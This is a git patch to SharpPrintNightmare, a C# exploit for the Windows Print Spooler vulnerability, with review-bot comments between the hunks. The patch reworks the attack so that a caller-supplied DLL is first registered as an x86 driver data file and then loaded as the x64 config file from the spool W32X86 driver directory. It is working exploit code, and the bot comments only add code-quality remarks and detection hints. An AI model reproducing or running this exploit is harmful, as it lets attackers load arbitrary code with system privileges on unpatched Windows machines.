From 2caad3a1bc1d4f33e6fa8b79fc74c1b639009394 Mon Sep 17 00:00:00 2001
From: testanull
Date: Sat, 3 Jul 2021 14:56:09 +0700
Subject: [PATCH] Drop file to x86 folder then load with x64
---
 .../SharpPrintNightmare/Program.cs | 20 +++++++++++++------
 1 file changed, 14 insertions(+), 6 deletions(-)
diff --git a/SharpPrintNightmare/SharpPrintNightmare/Program.cs b/SharpPrintNightmare/SharpPrintNightmare/Program.cs
index a03d26c..46359e2 100644
--- a/SharpPrintNightmare/SharpPrintNightmare/Program.cs
+++ b/SharpPrintNightmare/SharpPrintNightmare/Program.cs
@@ -117,16 +117,20 @@ namespace SharpPrintNightmare
 //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug
 //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug
+ string pDriverPathX86 = pDriverPath.Replace("ntprint.inf_amd64", "ntprint.inf_x86");
+ pDriverPathX86 = pDriverPathX86.Replace("Amd64", "I386");
+ Console.WriteLine($"[*] pDriverPath {pDriverPath}");
+ Console.WriteLine($"[*] pDriverPathX86 {pDriverPathX86}");
 Console.WriteLine($"[*] Executing {dllpath}");
- //DRIVER_INFO_2 Level2 = drivers[0]; // debug
+ //First drop to x86 folder
 DRIVER_INFO_2 Level2 = new DRIVER_INFO_2();
 Level2.cVersion = 3;
- Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
+ Level2.pConfigFile = "C:\\Windows\\SysWOW64\\kernelbase.dll";
 Level2.pDataFile = dllpath;
- Level2.pDriverPath = pDriverPath;
- Level2.pEnvironment = "Windows x64";
+ Level2.pDriverPath = pDriverPathX86;
+ Level2.pEnvironment = "Windows NT x86";
 Level2.pName = "12345";
 string filename = Path.GetFileName(dllpath);
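Review bot: The added comment `//First drop to x86 folder` does not name the folder or say what this first registration leaves on the host; a reader has to infer it from the `W32X86\\3\\{filename}` path used later in the patch. A comment along the lines of `// Stage 1: register for "Windows NT x86"; the data file is expected to end up under spool\drivers\W32X86\3` would document it, hedged because the copy itself is not visible in this hunk. For anyone reading the commit to build detections, the visible change is a driver registration for the `Windows NT x86` environment whose `pDataFile` is a caller-supplied path, so telemetry on printer-driver additions and on new DLLs in the W32X86 driver directory is what covers this variant. The enclosing method begins and ends outside the hunk.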
@@ -143,8 +147,12 @@ namespace SharpPrintNightmare for (int i = 1; i <= 30; i++) { - //add path to our exploit - Level2.pConfigFile = $"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{i}\\{filename}"; + //Then load it + Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll"; + Level2.pDriverPath = pDriverPath; + Level2.pEnvironment = "Windows x64"; + Level2.pConfigFile = $"C:\\Windows\\System32\\spool\\drivers\\W32X86\\3\\{filename}"; + //convert struct to unmanage code IntPtr pnt2 = Marshal.AllocHGlobal(Marshal.SizeOf(Level2)); Marshal.StructureToPtr(Level2, pnt2, false);
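Review bot: `Level2.pConfigFile` is assigned twice in a row inside the loop, so the first value, `"C:\\Windows\\System32\\kernelbase.dll"`, is a dead store that is overwritten before anything reads it. With `old\\{i}` gone from the path, `i` is no longer used in the visible lines and the three assignments look loop-invariant, though the loop body continues past the hunk. On the detection side, the config path is now the fixed location `spool\\drivers\\W32X86\\3\\` rather than `x64\\3\\old\\<n>\\`, so monitoring that only covers the `old` subdirectories would not see this version. Image loads by the spooler from the W32X86 driver directory on a 64-bit host are the signal to watch instead.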